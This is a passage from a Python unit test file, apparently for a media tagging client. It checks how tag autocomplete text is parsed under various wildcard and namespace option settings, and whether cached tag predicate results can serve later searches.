search_namespaces_into_full_tags,
namespace_bare_fetch_all_allowed,
namespace_fetch_all_allowed,
fetch_all_allowed
)
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ False, False, True, False, False, False, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '-', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ False, False, False, False, False, False, False ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'samus', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, False, False, True, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '*', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ False, False, False, True, False, False, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '*:*', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ False, False, False, True, False, False, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'series:', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, False, False, False, True, False, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'series:*', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, True, True, False, True ] )
#
#
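# With fetch_all_allowed on top, even the bare '*' and '*:*' wildcards become
# acceptable tag searches.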
tag_autocomplete_options = ClientTagsHandling.TagAutocompleteOptions( CC.COMBINED_TAG_SERVICE_KEY )
search_namespaces_into_full_tags = False
namespace_bare_fetch_all_allowed = False
namespace_fetch_all_allowed = True
fetch_all_allowed = True
tag_autocomplete_options.SetTuple(
tag_autocomplete_options.GetWriteAutocompleteTagDomain(),
tag_autocomplete_options.OverridesWriteAutocompleteFileDomain(),
tag_autocomplete_options.GetWriteAutocompleteFileDomain(),
search_namespaces_into_full_tags,
namespace_bare_fetch_all_allowed,
namespace_fetch_all_allowed,
fetch_all_allowed
)
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ False, False, True, False, False, False, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '-', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ False, False, False, False, False, False, False ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'samus', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, False, False, True, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '*', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ False, True, False, True, False, False, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '*:*', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ False, True, False, True, False, False, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'series:*', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, True, True, False, True ] )
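# A freshly initialised cache can never serve tag results.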
def test_predicate_results_cache_init( self ):
tag_autocomplete_options = ClientTagsHandling.TagAutocompleteOptions( CC.COMBINED_TAG_SERVICE_KEY )
search_namespaces_into_full_tags = False
namespace_bare_fetch_all_allowed = False
namespace_fetch_all_allowed = False
fetch_all_allowed = False
tag_autocomplete_options.SetTuple(
tag_autocomplete_options.GetWriteAutocompleteTagDomain(),
tag_autocomplete_options.OverridesWriteAutocompleteFileDomain(),
tag_autocomplete_options.GetWriteAutocompleteFileDomain(),
search_namespaces_into_full_tags,
namespace_bare_fetch_all_allowed,
namespace_fetch_all_allowed,
fetch_all_allowed
)
pat_empty = ClientSearch.ParsedAutocompleteText( '', tag_autocomplete_options, True )
pat_samus = ClientSearch.ParsedAutocompleteText( 'samus', tag_autocomplete_options, True )
pat_samus_ar = ClientSearch.ParsedAutocompleteText( 'samus ar', tag_autocomplete_options, True )
pat_samus_br = ClientSearch.ParsedAutocompleteText( 'samus br', tag_autocomplete_options, True )
pat_character_samus = ClientSearch.ParsedAutocompleteText( 'character:samus', tag_autocomplete_options, True )
pat_character_samus_ar = ClientSearch.ParsedAutocompleteText( 'character:samus ar', tag_autocomplete_options, True )
pat_character_samus_br = ClientSearch.ParsedAutocompleteText( 'character:samus br', tag_autocomplete_options, True )
pat_metroid = ClientSearch.ParsedAutocompleteText( 'metroid', tag_autocomplete_options, True )
pat_series_samus = ClientSearch.ParsedAutocompleteText( 'series:samus', tag_autocomplete_options, True )
predicate_results_cache = ClientSearch.PredicateResultsCacheInit()
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, False ), False )
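# A cache holding only system predicates cannot serve tag results either.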
def test_predicate_results_cache_system( self ):
tag_autocomplete_options = ClientTagsHandling.TagAutocompleteOptions( CC.COMBINED_TAG_SERVICE_KEY )
search_namespaces_into_full_tags = False
namespace_bare_fetch_all_allowed = False
namespace_fetch_all_allowed = False
fetch_all_allowed = False
tag_autocomplete_options.SetTuple(
tag_autocomplete_options.GetWriteAutocompleteTagDomain(),
tag_autocomplete_options.OverridesWriteAutocompleteFileDomain(),
tag_autocomplete_options.GetWriteAutocompleteFileDomain(),
search_namespaces_into_full_tags,
namespace_bare_fetch_all_allowed,
namespace_fetch_all_allowed,
fetch_all_allowed
)
pat_empty = ClientSearch.ParsedAutocompleteText( '', tag_autocomplete_options, True )
pat_samus = ClientSearch.ParsedAutocompleteText( 'samus', tag_autocomplete_options, True )
pat_samus_ar = ClientSearch.ParsedAutocompleteText( 'samus ar', tag_autocomplete_options, True )
pat_samus_br = ClientSearch.ParsedAutocompleteText( 'samus br', tag_autocomplete_options, True )
pat_character_samus = ClientSearch.ParsedAutocompleteText( 'character:samus', tag_autocomplete_options, True )
pat_character_samus_ar = ClientSearch.ParsedAutocompleteText( 'character:samus ar', tag_autocomplete_options, True )
pat_character_samus_br = ClientSearch.ParsedAutocompleteText( 'character:samus br', tag_autocomplete_options, True )
pat_metroid = ClientSearch.ParsedAutocompleteText( 'metroid', tag_autocomplete_options, True )
pat_series_samus = ClientSearch.ParsedAutocompleteText( 'series:samus', tag_autocomplete_options, True )
predicates = [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_INBOX ) ]
predicate_results_cache = ClientSearch.PredicateResultsCacheSystem( predicates )
self.assertEqual( predicate_results_cache.GetPredicates(), predicates )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, False ), False )
def test_predicate_results_cache_subtag_normal( self ):
tag_autocomplete_options = ClientTagsHandling.TagAutocompleteOptions( CC.COMBINED_TAG_SERVICE_KEY )
search_namespaces_into_full_tags = False
namespace_bare_fetch_all_allowed = False
namespace_fetch_all_allowed = False
fetch_all_allowed = False
tag_autocomplete_options.SetTuple(
tag_autocomplete_options.GetWriteAutocompleteTagDomain(),
tag_autocomplete_options.OverridesWriteAutocompleteFileDomain(),
tag_autocomplete_options.GetWriteAutocompleteFileDomain(),
search_namespaces_into_full_tags,
namespace_bare_fetch_all_allowed,
namespace_fetch_all_allowed,
fetch_all_allowed
)
pat_empty = ClientSearch.ParsedAutocompleteText( '', tag_autocomplete_options, True )
pat_samus = ClientSearch.ParsedAutocompleteText( 'samus', tag_autocomplete_options, True )
pat_samus_ar = ClientSearch.ParsedAutocompleteText( 'samus ar', tag_autocomplete_options, True )
pat_samus_br = ClientSearch.ParsedAutocompleteText( 'samus br', tag_autocomplete_options, True )
pat_character_samus = ClientSearch.ParsedAutocompleteText( 'character:samus', tag_autocomplete_options, True )
pat_character_samus_ar = ClientSearch.ParsedAutocompleteText( 'character:samus ar', tag_autocomplete_options, True )
pat_character_samus_br = ClientSearch.ParsedAutocompleteText( 'character:samus br', tag_autocomplete_options, True )
pat_metroid = ClientSearch.ParsedAutocompleteText( 'metroid', tag_autocomplete_options, True )
pat_series_samus = ClientSearch.ParsedAutocompleteText( 'series:samus', tag_autocomplete_options, True )
samus = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus' )
samus_aran = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus aran' )
character_samus_aran = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'character:samus aran' )
#
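# A non-exact cache built for the subtag 'samus' can serve any later search that
# extends 'samus', but not namespaced or unrelated searches.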
predicates = [ samus, samus_aran, character_samus_aran ]
predicate_results_cache = ClientSearch.PredicateResultsCacheTag( predicates, 'samus', False )
self.assertEqual( predicate_results_cache.GetPredicates(), predicates )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_br, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_br, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, False ), False )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'samus' ) ), { samus, samus_aran, character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'samus*' ) ), { samus, samus_aran, character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'samus br*' ) ), set() )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'samus ar*' ) ), { samus_aran, character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'samus aran*' ) ), { samus_aran, character_samus_aran } )
def test_predicate_results_cache_subtag_exact( self ):
tag_autocomplete_options = ClientTagsHandling.TagAutocompleteOptions( CC.COMBINED_TAG_SERVICE_KEY )
search_namespaces_into_full_tags = False
namespace_bare_fetch_all_allowed = False
namespace_fetch_all_allowed = False
fetch_all_allowed = False
tag_autocomplete_options.SetTuple(
tag_autocomplete_options.GetWriteAutocompleteTagDomain(),
tag_autocomplete_options.OverridesWriteAutocompleteFileDomain(),
tag_autocomplete_options.GetWriteAutocompleteFileDomain(),
search_namespaces_into_full_tags,
namespace_bare_fetch_all_allowed,
namespace_fetch_all_allowed,
fetch_all_allowed
)
pat_empty = ClientSearch.ParsedAutocompleteText( '', tag_autocomplete_options, True )
pat_samus = ClientSearch.ParsedAutocompleteText( 'samus', tag_autocomplete_options, True )
pat_samus_ar = ClientSearch.ParsedAutocompleteText( 'samus ar', tag_autocomplete_options, True )
pat_samus_br = ClientSearch.ParsedAutocompleteText( 'samus br', tag_autocomplete_options, True )
pat_character_samus = ClientSearch.ParsedAutocompleteText( 'character:samus', tag_autocomplete_options, True )
pat_character_samus_ar = ClientSearch.ParsedAutocompleteText( 'character:samus ar', tag_autocomplete_options, True )
pat_character_samus_br = ClientSearch.ParsedAutocompleteText( 'character:samus br', tag_autocomplete_options, True )
pat_metroid = ClientSearch.ParsedAutocompleteText( 'metroid', tag_autocomplete_options, True )
pat_series_samus = ClientSearch.ParsedAutocompleteText( 'series:samus', tag_autocomplete_options, True )
samus = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus' )
samus_aran = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus aran' )
character_samus_aran = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'character:samus aran' )
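# An exact-match cache only serves the identical 'samus' search, and only when an
# exact match is requested.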
predicates = [ samus ]
predicate_results_cache = ClientSearch.PredicateResultsCacheTag( predicates, 'samus', True )
self.assertEqual( predicate_results_cache.GetPredicates(), predicates )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, False ), False )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'samus' ) ), { samus } )
def test_predicate_results_cache_full_normal( self ):
tag_autocomplete_options = ClientTagsHandling.TagAutocompleteOptions( CC.COMBINED_TAG_SERVICE_KEY )
search_namespaces_into_full_tags = False
namespace_bare_fetch_all_allowed = False
namespace_fetch_all_allowed = False
fetch_all_allowed = False
tag_autocomplete_options.SetTuple(
tag_autocomplete_options.GetWriteAutocompleteTagDomain(),
tag_autocomplete_options.OverridesWriteAutocompleteFileDomain(),
tag_autocomplete_options.GetWriteAutocompleteFileDomain(),
search_namespaces_into_full_tags,
namespace_bare_fetch_all_allowed,
namespace_fetch_all_allowed,
fetch_all_allowed
)
pat_empty = ClientSearch.ParsedAutocompleteText( '', tag_autocomplete_options, True )
pat_samus = ClientSearch.ParsedAutocompleteText( 'samus', tag_autocomplete_options, True )
pat_samus_ar = ClientSearch.ParsedAutocompleteText( 'samus ar', tag_autocomplete_options, True )
pat_samus_br = ClientSearch.ParsedAutocompleteText( 'samus br', tag_autocomplete_options, True )
pat_character_samus = ClientSearch.ParsedAutocompleteText( 'character:samus', tag_autocomplete_options, True )
pat_character_samus_ar = ClientSearch.ParsedAutocompleteText( 'character:samus ar', tag_autocomplete_options, True )
pat_character_samus_br = ClientSearch.ParsedAutocompleteText( 'character:samus br', tag_autocomplete_options, True )
pat_metroid = ClientSearch.ParsedAutocompleteText( 'metroid', tag_autocomplete_options, True )
pat_series_samus = ClientSearch.ParsedAutocompleteText( 'series:samus', tag_autocomplete_options, True )
samus = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus' )
samus_aran = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus aran' )
character_samus_aran = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'character:samus aran' )
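# A cache built for the full tag 'character:samus' serves namespaced extensions of
# that text but not bare-subtag searches.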
predicates = [ character_samus_aran ]
predicate_results_cache = ClientSearch.PredicateResultsCacheTag( predicates, 'character:samus', False )
self.assertEqual( predicate_results_cache.GetPredicates(), predicates )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_ar, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_ar, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_br, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_br, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, False ), False )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus' ) ), { character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus*' ) ), { character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus ar*' ) ), { character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus br*' ) ), set() )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus aran*' ) ), { character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'characte:samus aran*' ) ), set() )
def test_predicate_results_cache_namespace_explicit_fetch_all( self ):
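# the cache is built from an explicit 'character:*' fetch-all: with the default options it can serve nothing, but once namespace_fetch_all_allowed is switched on it serves any 'character:' subquery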
tag_autocomplete_options = ClientTagsHandling.TagAutocompleteOptions( CC.COMBINED_TAG_SERVICE_KEY )
search_namespaces_into_full_tags = False
namespace_bare_fetch_all_allowed = False
namespace_fetch_all_allowed = False
fetch_all_allowed = False
tag_autocomplete_options.SetTuple(
tag_autocomplete_options.GetWriteAutocompleteTagDomain(),
tag_autocomplete_options.OverridesWriteAutocompleteFileDomain(),
tag_autocomplete_options.GetWriteAutocompleteFileDomain(),
search_namespaces_into_full_tags,
namespace_bare_fetch_all_allowed,
namespace_fetch_all_allowed,
fetch_all_allowed
)
pat_empty = ClientSearch.ParsedAutocompleteText( '', tag_autocomplete_options, True )
pat_samus = ClientSearch.ParsedAutocompleteText( 'samus', tag_autocomplete_options, True )
pat_samus_ar = ClientSearch.ParsedAutocompleteText( 'samus ar', tag_autocomplete_options, True )
pat_samus_br = ClientSearch.ParsedAutocompleteText( 'samus br', tag_autocomplete_options, True )
pat_character_samus = ClientSearch.ParsedAutocompleteText( 'character:samus', tag_autocomplete_options, True )
pat_character_samus_ar = ClientSearch.ParsedAutocompleteText( 'character:samus ar', tag_autocomplete_options, True )
pat_character_samus_br = ClientSearch.ParsedAutocompleteText( 'character:samus br', tag_autocomplete_options, True )
pat_metroid = ClientSearch.ParsedAutocompleteText( 'metroid', tag_autocomplete_options, True )
pat_series_samus = ClientSearch.ParsedAutocompleteText( 'series:samus', tag_autocomplete_options, True )
samus = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus' )
samus_aran = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus aran' )
character_samus_aran = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'character:samus aran' )
predicates = [ character_samus_aran ]
predicate_results_cache = ClientSearch.PredicateResultsCacheTag( predicates, 'character:*', False )
self.assertEqual( predicate_results_cache.GetPredicates(), predicates )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_ar, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_ar, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_br, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_br, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, False ), False )
#
search_namespaces_into_full_tags = False
namespace_bare_fetch_all_allowed = False
namespace_fetch_all_allowed = True
fetch_all_allowed = False
tag_autocomplete_options.SetTuple(
tag_autocomplete_options.GetWriteAutocompleteTagDomain(),
tag_autocomplete_options.OverridesWriteAutocompleteFileDomain(),
tag_autocomplete_options.GetWriteAutocompleteFileDomain(),
search_namespaces_into_full_tags,
namespace_bare_fetch_all_allowed,
namespace_fetch_all_allowed,
fetch_all_allowed
)
pat_empty = ClientSearch.ParsedAutocompleteText( '', tag_autocomplete_options, True )
pat_samus = ClientSearch.ParsedAutocompleteText( 'samus', tag_autocomplete_options, True )
pat_samus_ar = ClientSearch.ParsedAutocompleteText( 'samus ar', tag_autocomplete_options, True )
pat_samus_br = ClientSearch.ParsedAutocompleteText( 'samus br', tag_autocomplete_options, True )
pat_character_samus = ClientSearch.ParsedAutocompleteText( 'character:samus', tag_autocomplete_options, True )
pat_character_samus_ar = ClientSearch.ParsedAutocompleteText( 'character:samus ar', tag_autocomplete_options, True )
pat_character_samus_br = ClientSearch.ParsedAutocompleteText( 'character:samus br', tag_autocomplete_options, True )
pat_metroid = ClientSearch.ParsedAutocompleteText( 'metroid', tag_autocomplete_options, True )
pat_series_samus = ClientSearch.ParsedAutocompleteText( 'series:samus', tag_autocomplete_options, True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_ar, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_ar, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_br, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_br, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, False ), False )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus' ) ), { character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus*' ) ), { character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus ar*' ) ), { character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus br*' ) ), set() )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus aran*' ) ), { character_samus_aran } )
def test_predicate_results_cache_namespace_bare_fetch_all( self ):
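# the cache is built from a bare 'character:' fetch-all: useless under the default options, but it serves 'character:' subqueries once namespace_bare_fetch_all_allowed is enabled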
tag_autocomplete_options = ClientTagsHandling.TagAutocompleteOptions( CC.COMBINED_TAG_SERVICE_KEY )
search_namespaces_into_full_tags = False
namespace_bare_fetch_all_allowed = False
namespace_fetch_all_allowed = False
fetch_all_allowed = False
tag_autocomplete_options.SetTuple(
tag_autocomplete_options.GetWriteAutocompleteTagDomain(),
tag_autocomplete_options.OverridesWriteAutocompleteFileDomain(),
tag_autocomplete_options.GetWriteAutocompleteFileDomain(),
search_namespaces_into_full_tags,
namespace_bare_fetch_all_allowed,
namespace_fetch_all_allowed,
fetch_all_allowed
)
pat_empty = ClientSearch.ParsedAutocompleteText( '', tag_autocomplete_options, True )
pat_samus = ClientSearch.ParsedAutocompleteText( 'samus', tag_autocomplete_options, True )
pat_samus_ar = ClientSearch.ParsedAutocompleteText( 'samus ar', tag_autocomplete_options, True )
pat_samus_br = ClientSearch.ParsedAutocompleteText( 'samus br', tag_autocomplete_options, True )
pat_character_samus = ClientSearch.ParsedAutocompleteText( 'character:samus', tag_autocomplete_options, True )
pat_character_samus_ar = ClientSearch.ParsedAutocompleteText( 'character:samus ar', tag_autocomplete_options, True )
pat_character_samus_br = ClientSearch.ParsedAutocompleteText( 'character:samus br', tag_autocomplete_options, True )
pat_metroid = ClientSearch.ParsedAutocompleteText( 'metroid', tag_autocomplete_options, True )
pat_series_samus = ClientSearch.ParsedAutocompleteText( 'series:samus', tag_autocomplete_options, True )
samus = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus' )
samus_aran = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus aran' )
character_samus_aran = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'character:samus aran' )
predicates = [ character_samus_aran ]
predicate_results_cache = ClientSearch.PredicateResultsCacheTag( predicates, 'character:', False )
self.assertEqual( predicate_results_cache.GetPredicates(), predicates )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_ar, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_ar, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_br, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_br, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, False ), False )
#
search_namespaces_into_full_tags = False
namespace_bare_fetch_all_allowed = True
namespace_fetch_all_allowed = True
fetch_all_allowed = False
tag_autocomplete_options.SetTuple(
tag_autocomplete_options.GetWriteAutocompleteTagDomain(),
tag_autocomplete_options.OverridesWriteAutocompleteFileDomain(),
tag_autocomplete_options.GetWriteAutocompleteFileDomain(),
search_namespaces_into_full_tags,
